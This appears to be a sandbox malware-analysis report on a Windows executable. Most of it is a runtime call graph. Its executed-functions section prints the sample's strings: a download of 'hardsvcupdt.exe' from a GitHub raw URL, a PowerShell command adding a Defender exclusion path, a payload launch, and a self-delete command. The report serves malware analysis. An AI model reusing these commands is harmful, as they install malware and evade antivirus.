std::_Lockit::~_Lockit LeaveCriticalSection 18924->18928 18926 7ff646e4b910 18925->18926 18929 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18926->18929 18927->18923 19365 7ff646e4c680 18927->19365 18928->18927 18930 7ff646e4b920 18929->18930 18930->18733 18933 7ff646e4b933 18936 7ff646e41b10 Concurrency::cancel_current_task 37 API calls 18933->18936 18934 7ff646e4b8e4 18935 7ff646e59dbc std::_Facet_Register 37 API calls 18934->18935 18935->18923 18937 7ff646e4b938 18936->18937 18966 7ff646e599bc 18938->18966 18940 7ff646e59e1e 18946 7ff646e59e41 BuildCatchObjectHelperInternal 18940->18946 18970 7ff646e59ff4 18940->18970 18942 7ff646e59e36 18973 7ff646e5a024 18942->18973 18944 7ff646e49aff 18947 7ff646e49bf0 18944->18947 18946->18946 18977 7ff646e59a34 18946->18977 18948 7ff646e599bc std::_Lockit::_Lockit 39 API calls 18947->18948 18949 7ff646e49c20 18948->18949 18950 7ff646e599bc std::_Lockit::_Lockit 39 API calls 18949->18950 18954 7ff646e49c6f 18949->18954 18951 7ff646e49c45 18950->18951 18955 7ff646e59a34 std::_Lockit::~_Lockit LeaveCriticalSection 18951->18955 18952 7ff646e59a34 std::_Lockit::~_Lockit LeaveCriticalSection 18953 7ff646e49d00 18952->18953 18956 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 18953->18956 18957 7ff646e49cbc 18954->18957 19025 7ff646e41dd0 18954->19025 18955->18954 18958 7ff646e49d10 18956->18958 18957->18952 18958->18895 18961 7ff646e49d23 19056 7ff646e41b10 18961->19056 18962 7ff646e49cd4 19053 7ff646e59dbc 18962->19053 18967 7ff646e599cb 18966->18967 18969 7ff646e599d0 18966->18969 18981 7ff646e62df4 18967->18981 18969->18940 18971 7ff646e5aae8 std::_Facet_Register 37 API calls 18970->18971 18972 7ff646e5a006 18971->18972 18972->18942 18974 7ff646e5a036 18973->18974 18975 7ff646e5a049 18973->18975 19020 7ff646e5a714 18974->19020 18975->18946 18978 7ff646e59a48 18977->18978 18979 7ff646e59a3f LeaveCriticalSection 18977->18979 18978->18944 18984 7ff646e6936c 18981->18984 18985 7ff646e6937c 18984->18985 18986 7ff646e69398 18984->18986 18987 7ff646e68d24 __crtLCMapStringW 37 API calls 18985->18987 19008 7ff646e68cec 18986->19008 18987->18986 18989 7ff646e6939d 18990 7ff646e693c6 18989->18990 18991 7ff646e68d24 __crtLCMapStringW 37 API calls 18989->18991 18992 7ff646e68d24 __crtLCMapStringW 37 API calls 18990->18992 18993 7ff646e693ef 18990->18993 18991->18990 18992->18993 18994 7ff646e69418 18993->18994 18996 7ff646e68d24 __crtLCMapStringW 37 API calls 18993->18996 18995 7ff646e69441 18994->18995 18997 7ff646e68d24 __crtLCMapStringW 37 API calls 18994->18997 18998 7ff646e6946a 18995->18998 18999 7ff646e68d24 __crtLCMapStringW 37 API calls 18995->18999 18996->18994 18997->18995 19000 7ff646e69493 18998->19000 19001 7ff646e68d24 __crtLCMapStringW 37 API calls 18998->19001 18999->18998 19002 7ff646e694bc 19000->19002 19003 7ff646e68d24 __crtLCMapStringW 37 API calls 19000->19003 19001->19000 19004 7ff646e694e5 19002->19004 19006 7ff646e68d24 __crtLCMapStringW 37 API calls 19002->19006 19003->19002 19005 7ff646e62dfd EnterCriticalSection 19004->19005 19007 7ff646e68d24 __crtLCMapStringW 37 API calls 19004->19007 19006->19004 19007->19005 19009 7ff646e68cf9 19008->19009 19011 7ff646e68cfc 19008->19011 19009->18989 19010 7ff646e68d01 19010->18989 19011->19010 19019 7ff646e62d84 EnterCriticalSection 19011->19019 19021 7ff646e5a749 19020->19021 19022 7ff646e5a722 EncodePointer 19020->19022 19023 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 19021->19023 19022->18975 19024 7ff646e5a74e 19023->19024 19026 7ff646e41dfc 19025->19026 19027 7ff646e41f30 19025->19027 19026->19027 19028 7ff646e5aae8 std::_Facet_Register 37 API calls 19026->19028 19027->18961 19027->18962 19029 7ff646e41e0f 19028->19029 19030 7ff646e599bc std::_Lockit::_Lockit 39 API calls 19029->19030 19031 7ff646e41e40 19030->19031 19032 7ff646e41e7c 19031->19032 19033 7ff646e41f4e 19031->19033 19062 7ff646e59f6c 19032->19062 19067 7ff646e59c34 19033->19067 19054 7ff646e5aae8 std::_Facet_Register 37 API calls 19053->19054 19055 7ff646e59dcf 19054->19055 19055->18957 19057 7ff646e41b1e Concurrency::cancel_current_task 19056->19057 19058 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19057->19058 19059 7ff646e41b2f 19058->19059 19060 7ff646e5c798 __std_exception_copy 35 API calls 19059->19060 19061 7ff646e41b59 19060->19061 19072 7ff646e63100 19062->19072 19085 7ff646e41230 19067->19085 19070 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19071 7ff646e59c56 19070->19071 19073 7ff646e6936c std::_Locinfo::_Locinfo_ctor 38 API calls 19072->19073 19074 7ff646e63116 19073->19074 19077 7ff646e62e20 19074->19077 19084 7ff646e62d84 EnterCriticalSection 19077->19084 19086 7ff646e5c798 __std_exception_copy 35 API calls 19085->19086 19087 7ff646e41273 19086->19087 19088 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19087->19088 19089 7ff646e4128d 19088->19089 19089->19070 19092 7ff646e6314c 19090->19092 19091 7ff646e63172 19093 7ff646e62d18 _set_fmode 13 API calls 19091->19093 19092->19091 19094 7ff646e631a5 19092->19094 19095 7ff646e63177 19093->19095 19097 7ff646e631ab 19094->19097 19098 7ff646e631b8 19094->19098 19096 7ff646e62408 _invalid_parameter_noinfo 35 API calls 19095->19096 19099 7ff646e5a285 19096->19099 19100 7ff646e62d18 _set_fmode 13 API calls 19097->19100 19117 7ff646e6896c 19098->19117 19099->18909 19109 7ff646e61fe8 19099->19109 19100->19099 19110 7ff646e62018 19109->19110 19336 7ff646e61ccc 19110->19336 19112 7ff646e62034 19112->18911 19114 7ff646e60d20 19113->19114 19348 7ff646e60bcc 19114->19348 19116 7ff646e60d39 19116->18909 19130 7ff646e62d84 EnterCriticalSection 19117->19130 19337 7ff646e61d36 19336->19337 19338 7ff646e61cf6 19336->19338 19337->19338 19340 7ff646e61d42 19337->19340 19339 7ff646e62350 _invalid_parameter_noinfo 35 API calls 19338->19339 19342 7ff646e61d1d 19339->19342 19347 7ff646e610b8 EnterCriticalSection 19340->19347 19342->19112 19349 7ff646e60be7 19348->19349 19350 7ff646e60c15 19348->19350 19351 7ff646e62350 _invalid_parameter_noinfo 35 API calls 19349->19351 19353 7ff646e60c07 19350->19353 19358 7ff646e610b8 EnterCriticalSection 19350->19358 19351->19353 19353->19116 19360 7ff646e61079 19359->19360 19364 7ff646e61089 19359->19364 19361 7ff646e62d18 _set_fmode 13 API calls 19360->19361 19362 7ff646e6107e 19361->19362 19363 7ff646e62408 _invalid_parameter_noinfo 35 API calls 19362->19363 19363->19364 19364->18917 19366 7ff646e4c6ac 19365->19366 19380 7ff646e4b8de 19365->19380 19367 7ff646e5aae8 std::_Facet_Register 37 API calls 19366->19367 19366->19380 19368 7ff646e4c6bf 19367->19368 19369 7ff646e599bc std::_Lockit::_Lockit 39 API calls 19368->19369 19370 7ff646e4c6f0 19369->19370 19371 7ff646e4c72c 19370->19371 19372 7ff646e4c7e6 19370->19372 19374 7ff646e59f6c std::_Locinfo::_Locinfo_ctor 67 API calls 19371->19374 19373 7ff646e59c34 37 API calls 19372->19373 19375 7ff646e4c7f2 19373->19375 19376 7ff646e4c738 19374->19376 19381 7ff646e59fd8 19376->19381 19378 7ff646e4c753 19379 7ff646e59a34 std::_Lockit::~_Lockit LeaveCriticalSection 19378->19379 19379->19380 19380->18933 19380->18934 19382 7ff646e59fec 19381->19382 19383 7ff646e59fe5 19381->19383 19382->19378 19384 7ff646e63100 std::_Locinfo::_Locinfo_ctor 67 API calls 19383->19384 19384->19382 19386 7ff646e58250 19385->19386 19390 7ff646e5822a 19385->19390 19388 7ff646e5825e 19386->19388 19395 7ff646e49870 19386->19395 19387 7ff646e5824a 19387->18741 19388->18741 19390->19387 19391 7ff646e420e0 72 API calls 19390->19391 19392 7ff646e582b3 19391->19392 19393 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19392->19393 19394 7ff646e582c4 19393->19394 19396 7ff646e498ae 19395->19396 19405 7ff646e49930 19395->19405 19411 7ff646e49010 19396->19411 19397 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19399 7ff646e4995e 19397->19399 19399->19388 19401 7ff646e4991d 19415 7ff646e59c58 __uncaught_exceptions 19401->19415 19403 7ff646e49922 19403->19405 19419 7ff646e499d0 19403->19419 19405->19397 19406 7ff646e49973 19407 7ff646e420e0 72 API calls 19406->19407 19408 7ff646e499b5 19407->19408 19409 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19408->19409 19410 7ff646e499c6 19409->19410 19412 7ff646e49039 19411->19412 19413 7ff646e4904e 19412->19413 19414 7ff646e49870 81 API calls 19412->19414 19413->19401 19413->19406 19414->19413 19415->19403 19416 7ff646e5ca88 19415->19416 19426 7ff646e5ce30 19416->19426 19420 7ff646e49a19 19419->19420 19421 7ff646e499e7 19419->19421 19420->19405 19421->19420 19422 7ff646e420e0 72 API calls 19421->19422 19423 7ff646e49a5f 19422->19423 19424 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19423->19424 19425 7ff646e49a70 19424->19425 19427 7ff646e5ce47 GetLastError 19426->19427 19428 7ff646e5ca91 19426->19428 19431 7ff646e6032c 19427->19431 19428->19403 19432 7ff646e6014c __vcrt_InitializeCriticalSectionEx 5 API calls 19431->19432 19433 7ff646e60353 TlsGetValue 19432->19433 19436 7ff646e59bec 37 API calls 19435->19436 19437 7ff646e58680 19436->19437 19439 7ff646e49242 19438->19439 19440 7ff646e49193 19438->19440 19441 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19439->19441 19440->19439 19446 7ff646e4919d 19440->19446 19442 7ff646e49251 19441->19442 19442->18782 19443 7ff646e491e1 19444 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19443->19444 19445 7ff646e491fe 19444->19445 19445->18782 19446->19443 19448 7ff646e61474 19446->19448 19449 7ff646e614a4 19448->19449 19452 7ff646e611c4 19449->19452 19451 7ff646e614c2 19451->19443 19453 7ff646e611e4 19452->19453 19458 7ff646e61211 19452->19458 19454 7ff646e61219 19453->19454 19455 7ff646e611ee 19453->19455 19453->19458 19459 7ff646e61104 19454->19459 19456 7ff646e62350 _invalid_parameter_noinfo 35 API calls 19455->19456 19456->19458 19458->19451 19466 7ff646e610b8 EnterCriticalSection 19459->19466 19468 7ff646e591ba GetLastError 19467->19468 19469 7ff646e591c2 19467->19469 19468->19469 19469->18788 19469->18791 19469->18795 19471 7ff646e58857 19470->19471 19472 7ff646e58812 GetLastError 19470->19472 19471->18796 19471->18803 19473 7ff646e5881f 19472->19473 19474 7ff646e5882e SetFileInformationByHandle 19472->19474 19473->19471 19473->19474 19474->19471 19475 7ff646e5884f GetLastError 19474->19475 19475->19471 19477 7ff646e45411 19476->19477 19503 7ff646e58e3c 19477->19503 19480 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19481 7ff646e454ac 19480->19481 19481->18834 19481->18838 19483 7ff646e47a6c 19482->19483 19484 7ff646e4d2d0 37 API calls 19483->19484 19485 7ff646e47ad1 CreateProcessW 19484->19485 19486 7ff646e47b19 WaitForSingleObject CloseHandle CloseHandle 19485->19486 19488 7ff646e47b15 19485->19488 19486->19488 19487 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19490 7ff646e47b89 19487->19490 19489 7ff646e47b75 ctype 19488->19489 19491 7ff646e47b9a 19488->19491 19489->19487 19490->18844 19492 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19491->19492 19493 7ff646e47b9f 19492->19493 19494 7ff646e4b800 71 API calls 19493->19494 19495 7ff646e47bb1 19494->19495 19495->18844 19544 7ff646e48cc0 19496->19544 19500 7ff646e44987 19501 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19500->19501 19502 7ff646e44998 19501->19502 19504 7ff646e58e7e 19503->19504 19505 7ff646e58f44 19504->19505 19508 7ff646e58edf GetFileAttributesExW 19504->19508 19537 7ff646e58e87 19504->19537 19507 7ff646e59178 __std_fs_open_handle 2 API calls 19505->19507 19505->19537 19506 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19509 7ff646e45427 19506->19509 19510 7ff646e58fbc 19507->19510 19508->19505 19511 7ff646e58ef3 GetLastError 19508->19511 19509->19480 19512 7ff646e58fe2 19510->19512 19513 7ff646e58fc2 19510->19513 19514 7ff646e58f02 FindFirstFileW 19511->19514 19511->19537 19516 7ff646e5908f 19512->19516 19517 7ff646e58ff1 GetFileInformationByHandleEx 19512->19517 19515 7ff646e58fcd CloseHandle 19513->19515 19513->19537 19518 7ff646e58f16 GetLastError 19514->19518 19519 7ff646e58f21 FindClose 19514->19519 19520 7ff646e59151 19515->19520 19515->19537 19521 7ff646e590aa GetFileInformationByHandleEx 19516->19521 19522 7ff646e590e4 19516->19522 19523 7ff646e5900b GetLastError 19517->19523 19524 7ff646e59031 19517->19524 19518->19537 19519->19505 19525 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 19520->19525 19521->19522 19526 7ff646e590c0 GetLastError 19521->19526 19528 7ff646e590fb 19522->19528 19529 7ff646e59137 19522->19529 19527 7ff646e59019 CloseHandle 19523->19527 19523->19537 19524->19516 19535 7ff646e59052 GetFileInformationByHandleEx 19524->19535 19531 7ff646e59156 19525->19531 19532 7ff646e590d2 CloseHandle 19526->19532 19526->19537 19533 7ff646e59162 19527->19533 19527->19537 19534 7ff646e59101 CloseHandle 19528->19534 19528->19537 19530 7ff646e5913d CloseHandle 19529->19530 19529->19537 19530->19520 19530->19537 19540 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 19531->19540 19536 7ff646e5915c 19532->19536 19532->19537 19538 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 19533->19538 19534->19520 19534->19537 19535->19516 19539 7ff646e5906e GetLastError 19535->19539 19541 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 19536->19541 19537->19506 19542 7ff646e59168 19538->19542 19539->19537 19543 7ff646e5907c CloseHandle 19539->19543 19540->19536 19541->19533 19543->19531 19543->19537 19545 7ff646e48ce0 19544->19545 19545->19545 19546 7ff646e4c1f0 37 API calls 19545->19546 19547 7ff646e44965 19546->19547 19548 7ff646e441d0 19547->19548 19560 7ff646e414f0 19548->19560 19550 7ff646e441f8 19571 7ff646e443d0 19550->19571 19552 7ff646e442cc ctype 19552->19500 19553 7ff646e44292 19553->19552 19554 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19553->19554 19555 7ff646e442e1 19554->19555 19556 7ff646e414f0 72 API calls 19555->19556 19557 7ff646e44327 19556->19557 19558 7ff646e443d0 78 API calls 19557->19558 19559 7ff646e4439d 19558->19559 19559->19500 19609 7ff646e48d00 19560->19609 19562 7ff646e41524 19563 7ff646e5c798 __std_exception_copy 35 API calls 19562->19563 19564 7ff646e41570 19563->19564 19565 7ff646e415ae ctype 19564->19565 19568 7ff646e415e5 19564->19568 19566 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19565->19566 19567 7ff646e415d4 19566->19567 19567->19550 19569 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19568->19569 19570 7ff646e415ea __std_exception_destroy ctype 19569->19570 19570->19550 19625 7ff646e58880 19571->19625 19576 7ff646e4b500 41 API calls 19577 7ff646e4449c 19576->19577 19578 7ff646e444d1 19577->19578 19645 7ff646e4c0a0 19577->19645 19659 7ff646e49670 19578->19659 19581 7ff646e444e4 19582 7ff646e49670 39 API calls 19581->19582 19583 7ff646e444f9 19582->19583 19584 7ff646e49670 39 API calls 19583->19584 19585 7ff646e44513 19584->19585 19586 7ff646e44546 19585->19586 19587 7ff646e49670 39 API calls 19585->19587 19591 7ff646e44553 ctype 19586->19591 19664 7ff646e4c2f0 19586->19664 19588 7ff646e4452c 19587->19588 19590 7ff646e49670 39 API calls 19588->19590 19590->19586 19592 7ff646e445fe ctype 19591->19592 19594 7ff646e44633 19591->19594 19595 7ff646e4462e 19591->19595 19593 7ff646e5aac0 __std_fs_get_file_attributes_by_handle 8 API calls 19592->19593 19596 7ff646e44612 19593->19596 19597 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19594->19597 19598 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19595->19598 19596->19553 19599 7ff646e44639 ctype 19597->19599 19598->19594 19600 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19599->19600 19601 7ff646e4472b __std_exception_destroy ctype 19599->19601 19602 7ff646e44781 ctype 19600->19602 19601->19553 19603 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19602->19603 19604 7ff646e448ae 19603->19604 19605 7ff646e5c798 __std_exception_copy 35 API calls 19604->19605 19606 7ff646e448e2 19605->19606 19607 7ff646e48d00 72 API calls 19606->19607 19608 7ff646e44927 19607->19608 19608->19553 19610 7ff646e48d2e 19609->19610 19615 7ff646e48dd2 19610->19615 19617 7ff646e48d4a BuildCatchObjectHelperInternal 19610->19617 19620 7ff646e48d7a 19610->19620 19624 7ff646e48e0d 19610->19624 19611 7ff646e41210 37 API calls 19612 7ff646e48e13 19611->19612 19613 7ff646e48780 70 API calls 19612->19613 19616 7ff646e48e34 ctype 19613->19616 19614 7ff646e5aae8 std::_Facet_Register 37 API calls 19618 7ff646e48d90 19614->19618 19621 7ff646e5aae8 std::_Facet_Register 37 API calls 19615->19621 19616->19562 19617->19562 19618->19617 19623 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19618->19623 19619 7ff646e48e07 19622 7ff646e41170 Concurrency::cancel_current_task 37 API calls 19619->19622 19620->19614 19620->19619 19621->19617 19622->19624 19623->19619 19624->19611 19678 7ff646e624a0 19625->19678 19628 7ff646e58892 AreFileApisANSI 19629 7ff646e44434 19628->19629 19630 7ff646e4b500 19629->19630 19631 7ff646e44469 19630->19631 19632 7ff646e4b552 19630->19632 19631->19576 19633 7ff646e4b643 19632->19633 19683 7ff646e588a8 WideCharToMultiByte 19632->19683 19707 7ff646e41730 19633->19707 19636 7ff646e4b649 19637 7ff646e41aa0 2 API calls 19636->19637 19639 7ff646e4b655 19637->19639 19640 7ff646e4b58c __scrt_get_show_window_mode 19642 7ff646e588a8 4 API calls 19640->19642 19643 7ff646e4b61b 19642->19643 19643->19631 19703 7ff646e41aa0 19643->19703 19646 7ff646e4c1e5 19645->19646 19650 7ff646e4c0c9 19645->19650 19647 7ff646e41210 37 API calls 19646->19647 19648 7ff646e4c1eb 19647->19648 19649 7ff646e5aae8 std::_Facet_Register 37 API calls 19657 7ff646e4c114 BuildCatchObjectHelperInternal 19649->19657 19651 7ff646e4c15d 19650->19651 19652 7ff646e4c121 19650->19652 19650->19657 19653 7ff646e5aae8 std::_Facet_Register 37 API calls 19651->19653 19652->19649 19654 7ff646e4c1df 19652->19654 19653->19657 19656 7ff646e41170 Concurrency::cancel_current_task 37 API calls 19654->19656 19655 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19655->19654 19656->19646 19657->19655 19658 7ff646e4c1a7 ctype BuildCatchObjectHelperInternal 19657->19658 19658->19578 19660 7ff646e496d2 19659->19660 19662 7ff646e49693 BuildCatchObjectHelperInternal 19659->19662 19713 7ff646e4c460 19660->19713 19662->19581 19663 7ff646e496eb 19663->19581 19665 7ff646e4c450 19664->19665 19669 7ff646e4c31f 19664->19669 19666 7ff646e41210 37 API calls 19665->19666 19667 7ff646e4c456 19666->19667 19668 7ff646e5aae8 std::_Facet_Register 37 API calls 19676 7ff646e4c36a BuildCatchObjectHelperInternal 19668->19676 19670 7ff646e4c377 19669->19670 19671 7ff646e4c3b3 19669->19671 19669->19676 19670->19668 19672 7ff646e4c44a 19670->19672 19673 7ff646e5aae8 std::_Facet_Register 37 API calls 19671->19673 19675 7ff646e41170 Concurrency::cancel_current_task 37 API calls 19672->19675 19673->19676 19674 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19674->19672 19675->19665 19676->19674 19677 7ff646e4c406 ctype BuildCatchObjectHelperInternal 19676->19677 19677->19591 19679 7ff646e67380 _Getctype 36 API calls 19678->19679 19680 7ff646e624a9 19679->19680 19681 7ff646e69680 _Getctype 36 API calls 19680->19681 19682 7ff646e58889 19681->19682 19682->19628 19682->19629 19684 7ff646e58907 19683->19684 19685 7ff646e588ff GetLastError 19683->19685 19686 7ff646e58914 WideCharToMultiByte 19684->19686 19688 7ff646e4b571 19684->19688 19685->19684 19687 7ff646e58942 GetLastError 19686->19687 19686->19688 19687->19688 19688->19636 19688->19640 19689 7ff646e4d6d0 19688->19689 19690 7ff646e4d86a 19689->19690 19693 7ff646e4d6ff 19689->19693 19691 7ff646e41210 37 API calls 19690->19691 19692 7ff646e4d870 19691->19692 19692->19640 19695 7ff646e4d75c 19693->19695 19696 7ff646e4d798 19693->19696 19701 7ff646e4d74f __scrt_get_show_window_mode BuildCatchObjectHelperInternal 19693->19701 19694 7ff646e5aae8 std::_Facet_Register 37 API calls 19694->19701 19695->19694 19697 7ff646e4d864 19695->19697 19698 7ff646e5aae8 std::_Facet_Register 37 API calls 19696->19698 19699 7ff646e41170 Concurrency::cancel_current_task 37 API calls 19697->19699 19698->19701 19699->19690 19700 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19700->19697 19701->19700 19702 7ff646e4d80e ctype __scrt_get_show_window_mode BuildCatchObjectHelperInternal 19701->19702 19702->19640 19704 7ff646e41ab0 19703->19704 19705 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19704->19705 19706 7ff646e41ad8 19705->19706 19708 7ff646e41743 19707->19708 19709 7ff646e5c9e0 std::_Xinvalid_argument 2 API calls 19708->19709 19710 7ff646e4176b 19709->19710 19711 7ff646e5c798 __std_exception_copy 35 API calls 19710->19711 19712 7ff646e4179d 19711->19712 19712->19636 19714 7ff646e4c5e1 19713->19714 19717 7ff646e4c498 19713->19717 19715 7ff646e41210 37 API calls 19714->19715 19716 7ff646e4c5e7 19715->19716 19732 7ff646e58cd8 19716->19732 19720 7ff646e4c52c 19717->19720 19721 7ff646e4c4f0 19717->19721 19728 7ff646e4c4e3 BuildCatchObjectHelperInternal 19717->19728 19718 7ff646e5aae8 std::_Facet_Register 37 API calls 19718->19728 19723 7ff646e5aae8 std::_Facet_Register 37 API calls 19720->19723 19721->19718 19724 7ff646e4c5db 19721->19724 19722 7ff646e4c635 ctype 19722->19663 19723->19728 19726 7ff646e41170 Concurrency::cancel_current_task 37 API calls 19724->19726 19725 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19725->19724 19726->19714 19728->19725 19731 7ff646e4c58c ctype BuildCatchObjectHelperInternal 19728->19731 19729 7ff646e62428 _invalid_parameter_noinfo_noreturn 35 API calls 19730 7ff646e4c659 19729->19730 19730->19663 19731->19663 19733 7ff646e4c602 19732->19733 19734 7ff646e58ce2 FindClose 19732->19734 19733->19722 19733->19729 19734->19733 19735 7ff646e58cf1 19734->19735 19736 7ff646e62b78 BuildCatchObjectHelperInternal 36 API calls 19735->19736 19737 7ff646e58cf6 19736->19737

                          Executed Functions

                          Function 00007FF646E566B0 Relevance: 24.8, APIs: 8, Strings: 6, Instructions: 349filenetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 7ff646e566b0-7ff646e5671f call 7ff646e73b50 GetCurrentDirectoryW 3 7ff646e56720-7ff646e56728 0->3 3->3 4 7ff646e5672a-7ff646e56855 call 7ff646e4bf70 call 7ff646e4d2d0 * 2 call 7ff646e564c0 3->4 13 7ff646e56857-7ff646e5686e 4->13 14 7ff646e5688e-7ff646e56ac8 4->14 16 7ff646e56889 call 7ff646e5aae0 13->16 17 7ff646e56870-7ff646e56883 13->17 15 7ff646e56ad0-7ff646e56ad7 14->15 15->15 18 7ff646e56ad9-7ff646e56b09 call 7ff646e4c1f0 call 7ff646e563c0 15->18 16->14 17->16 19 7ff646e56d5e-7ff646e56d63 call 7ff646e62428 17->19 30 7ff646e56b0b 18->30 31 7ff646e56b0e-7ff646e56b31 URLDownloadToFileW 18->31 25 7ff646e56d64-7ff646e56d69 call 7ff646e62428 19->25 32 7ff646e56d6a-7ff646e56d6f call 7ff646e62428 25->32 30->31 33 7ff646e56b6a-7ff646e56b85 31->33 34 7ff646e56b33-7ff646e56b4a 31->34 48 7ff646e56d70-7ff646e56d75 call 7ff646e62428 32->48 38 7ff646e56b87-7ff646e56b99 33->38 39 7ff646e56bb9-7ff646e56bbb 33->39 36 7ff646e56b4c-7ff646e56b5f 34->36 37 7ff646e56b65 call 7ff646e5aae0 34->37 36->25 36->37 37->33 44 7ff646e56b9b-7ff646e56bae 38->44 45 7ff646e56bb4 call 7ff646e5aae0 38->45 40 7ff646e56ca1-7ff646e56ca9 39->40 41 7ff646e56bc1-7ff646e56c46 call 7ff646e4d2d0 call 7ff646e564c0 39->41 49 7ff646e56cab-7ff646e56cc1 40->49 50 7ff646e56ce1-7ff646e56cf9 40->50 66 7ff646e56c4b-7ff646e56c56 41->66 44->32 44->45 45->39 57 7ff646e56d76-7ff646e56d7b call 7ff646e62428 48->57 55 7ff646e56cdc call 7ff646e5aae0 49->55 56 7ff646e56cc3-7ff646e56cd6 49->56 51 7ff646e56cfb-7ff646e56d11 50->51 52 7ff646e56d2d-7ff646e56d57 call 7ff646e5aac0 50->52 59 7ff646e56d28 call 7ff646e5aae0 51->59 60 7ff646e56d13-7ff646e56d26 51->60 55->50 56->55 56->57 59->52 60->59 64 7ff646e56d58-7ff646e56d5d call 7ff646e62428 60->64 64->19 69 7ff646e56c58-7ff646e56c6f 66->69 70 7ff646e56c8f-7ff646e56c9c 66->70 73 7ff646e56c8a call 7ff646e5aae0 69->73 74 7ff646e56c71-7ff646e56c84 69->74 70->40 73->70 74->48 74->73
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$CurrentDirectoryDownloadFile
                          • String ID: :$cmd.exe /c {}$https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe$powershell -Command "Add-MpPreference -ExclusionPath '{}'"$start "" "{}"${}\pyld64.exe
                          • API String ID: 3881568712-293492150
                          • Opcode ID: 3bd65feed952b0ad94b3697cae216dfbc650da4c0f19702ece63dfaa4f1c20c7
                          • Instruction ID: cae4a5833f9a5f66f54106bae3d574338c965a5383c8510b5364ed84dd9a0b39
                          • Opcode Fuzzy Hash: 3bd65feed952b0ad94b3697cae216dfbc650da4c0f19702ece63dfaa4f1c20c7
                          • Instruction Fuzzy Hash: 0E12A321A1CBC281E751B77CE84426AABB0BB56374F104376DAFD855FADF2DA142CB01
                          Function 00007FF646E57820 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 173memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Sleep$_invalid_parameter_noinfo_noreturn$AllocateCheckFileFreeInitializeMembershipModuleNameToken
                          • String ID: "$timeout /t 10 /nobreak && del "{}"
                          • API String ID: 2170925606-2375892666
                          • Opcode ID: 6c58272db017810f1fb10a02c44dc568b704be8e37eb715e7faaa9869de241d5
                          • Instruction ID: 9aec5db1940650594ee31ca1ac2fbe3662da7b4353c2d938dcf8177fd525c0a6
                          • Opcode Fuzzy Hash: 6c58272db017810f1fb10a02c44dc568b704be8e37eb715e7faaa9869de241d5
                          • Instruction Fuzzy Hash: 6A715F72F1CB5189FB00EBB9E8853ADA3B1FB48788F501136DA5D92A99DF39D184C700
                          Function 00007FF646E5AC44 Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
